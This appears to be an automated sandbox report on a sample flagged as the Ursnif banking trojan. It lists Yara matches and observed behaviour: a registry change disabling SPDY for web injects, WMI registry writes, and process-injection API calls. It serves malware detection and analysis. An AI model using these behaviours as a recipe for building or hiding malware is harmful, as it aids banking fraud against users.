Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Source: C:\Users\user\Desktop\lia.exe

1_2_00B17479

System Summary:

Writes or reads registry keys via WMI

Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Detected potential crypto function

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B16DD3	1_2_00B16DD3
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B17F60	1_2_00B17F60
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B16B67	1_2_00B16B67
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E63BC	1_2_039E63BC
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EA241	1_2_039EA241
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D95FE	1_2_039D95FE
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EF1EE	1_2_039EF1EE
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D9D64	1_2_039D9D64
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DC086	1_2_039DC086
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D34DC	1_2_039D34DC
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E78F1	1_2_039E78F1
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D504A	1_2_039D504A
Source: C:\Windows\System32\control.exe	Code function: 18_2_0054AB44	18_2_0054AB44
Source: C:\Windows\System32\control.exe	Code function: 18_2_0054B58C	18_2_0054B58C
Source: C:\Windows\System32\control.exe	Code function: 18_2_005386D0	18_2_005386D0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00549858	18_2_00549858
Source: C:\Windows\System32\control.exe	Code function: 18_2_00532804	18_2_00532804
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053A808	18_2_0053A808
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053B008	18_2_0053B008
Source: C:\Windows\System32\control.exe	Code function: 18_2_00548820	18_2_00548820
Source: C:\Windows\System32\control.exe	Code function: 18_2_00538024	18_2_00538024
Source: C:\Windows\System32\control.exe	Code function: 18_2_00535828	18_2_00535828
Source: C:\Windows\System32\control.exe	Code function: 18_2_005268FC	18_2_005268FC
Source: C:\Windows\System32\control.exe	Code function: 18_2_005340E8	18_2_005340E8
Source: C:\Windows\System32\control.exe	Code function: 18_2_00523890	18_2_00523890
Source: C:\Windows\System32\control.exe	Code function: 18_2_00524080	18_2_00524080
Source: C:\Windows\System32\control.exe	Code function: 18_2_00545954	18_2_00545954
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052B154	18_2_0052B154
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053194B	18_2_0053194B
Source: C:\Windows\System32\control.exe	Code function: 18_2_005231D4	18_2_005231D4
Source: C:\Windows\System32\control.exe	Code function: 18_2_00536190	18_2_00536190
Source: C:\Windows\System32\control.exe	Code function: 18_2_005352CC	18_2_005352CC
Source: C:\Windows\System32\control.exe	Code function: 18_2_005212BC	18_2_005212BC
Source: C:\Windows\System32\control.exe	Code function: 18_2_00542330	18_2_00542330
Source: C:\Windows\System32\control.exe	Code function: 18_2_00537BFC	18_2_00537BFC
Source: C:\Windows\System32\control.exe	Code function: 18_2_00542BA0	18_2_00542BA0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00523BA4	18_2_00523BA4
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053BC10	18_2_0053BC10
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052C49C	18_2_0052C49C
Source: C:\Windows\System32\control.exe	Code function: 18_2_005344B4	18_2_005344B4
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052DCA8	18_2_0052DCA8
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053CCA8	18_2_0053CCA8
Source: C:\Windows\System32\control.exe	Code function: 18_2_00530544	18_2_00530544
Source: C:\Windows\System32\control.exe	Code function: 18_2_00547D6C	18_2_00547D6C
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053751C	18_2_0053751C
Source: C:\Windows\System32\control.exe	Code function: 18_2_00544530	18_2_00544530
Source: C:\Windows\System32\control.exe	Code function: 18_2_00529DF0	18_2_00529DF0
Source: C:\Windows\System32\control.exe	Code function: 18_2_0054C588	18_2_0054C588
Source: C:\Windows\System32\control.exe	Code function: 18_2_00548DA0	18_2_00548DA0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00531618	18_2_00531618
Source: C:\Windows\System32\control.exe	Code function: 18_2_00543E2C	18_2_00543E2C
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052A6D0	18_2_0052A6D0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00547EA0	18_2_00547EA0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00539740	18_2_00539740
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052CF44	18_2_0052CF44
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053FF4C	18_2_0053FF4C
Source: C:\Windows\System32\control.exe	Code function: 18_2_00527F64	18_2_00527F64
Source: C:\Windows\System32\control.exe	Code function: 18_2_005437D0	18_2_005437D0
Source: C:\Windows\System32\control.exe	Code function: 18_2_00548FA8	18_2_00548FA8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F86D0	34_2_00000215F47F86D0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F480AB44	34_2_00000215F480AB44
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4808820	34_2_00000215F4808820
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E3BA4	34_2_00000215F47E3BA4
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4809858	34_2_00000215F4809858
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4802BA0	34_2_00000215F4802BA0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4808FA8	34_2_00000215F4808FA8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F5828	34_2_00000215F47F5828
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F8024	34_2_00000215F47F8024
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F48037D0	34_2_00000215F48037D0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FBC10	34_2_00000215F47FBC10
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FB008	34_2_00000215F47FB008
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FA808	34_2_00000215F47FA808
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F2804	34_2_00000215F47F2804
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F7BFC	34_2_00000215F47F7BFC
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F40E8	34_2_00000215F47F40E8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4804530	34_2_00000215F4804530
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F44B4	34_2_00000215F47F44B4
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47EDCA8	34_2_00000215F47EDCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47EC49C	34_2_00000215F47EC49C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4805954	34_2_00000215F4805954
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E3890	34_2_00000215F47E3890
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E4080	34_2_00000215F47E4080
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4807D6C	34_2_00000215F4807D6C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47EB154	34_2_00000215F47EB154
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F194B	34_2_00000215F47F194B
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F0544	34_2_00000215F47F0544
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FCCA8	34_2_00000215F47FCCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F751C	34_2_00000215F47F751C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E68FC	34_2_00000215F47E68FC
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E9DF0	34_2_00000215F47E9DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E31D4	34_2_00000215F47E31D4
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4803E2C	34_2_00000215F4803E2C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F6190	34_2_00000215F47F6190
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F480C588	34_2_00000215F480C588
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F480B58C	34_2_00000215F480B58C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4808DA0	34_2_00000215F4808DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F1618	34_2_00000215F47F1618
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47EA6D0	34_2_00000215F47EA6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F52CC	34_2_00000215F47F52CC
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E12BC	34_2_00000215F47E12BC
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4802330	34_2_00000215F4802330
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FFF4C	34_2_00000215F47FFF4C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E7F64	34_2_00000215F47E7F64
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4807EA0	34_2_00000215F4807EA0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47ECF44	34_2_00000215F47ECF44
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F9740	34_2_00000215F47F9740
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036C63BC	44_2_036C63BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CA241	44_2_036CA241
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CF1EE	44_2_036CF1EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B504A	44_2_036B504A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036C78F1	44_2_036C78F1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036BC086	44_2_036BC086
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CCF97	44_2_036CCF97
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B9D64	44_2_036B9D64
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B95FE	44_2_036B95FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D5430	44_2_036D5430
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B34DC	44_2_036B34DC

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_039DE6B9 CreateProcessAsUserA,

1_2_039DE6B9

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Uses 32bit PE files

Source: lia.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains functionality to call native functions

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	1_2_0040140F
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_0040182F GetProcAddress,NtCreateSection,memset,	1_2_0040182F
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00401ABC NtMapViewOfSection,	1_2_00401ABC
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B160A0 NtMapViewOfSection,	1_2_00B160A0
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B15D85 GetProcAddress,NtCreateSection,memset,	1_2_00B15D85
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B1231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_00B1231E
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B18185 NtQueryVirtualMemory,	1_2_00B18185
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EB38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	1_2_039EB38D
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DD317 NtMapViewOfSection,	1_2_039DD317
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039ECEED GetProcAddress,NtCreateSection,memset,	1_2_039ECEED
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F1AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_039F1AE3
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D76E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_039D76E3
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DD274 NtQueryInformationProcess,	1_2_039DD274
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_039F29E0
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E2931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_039E2931
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_039E7523
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_039D317C
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_039D696A
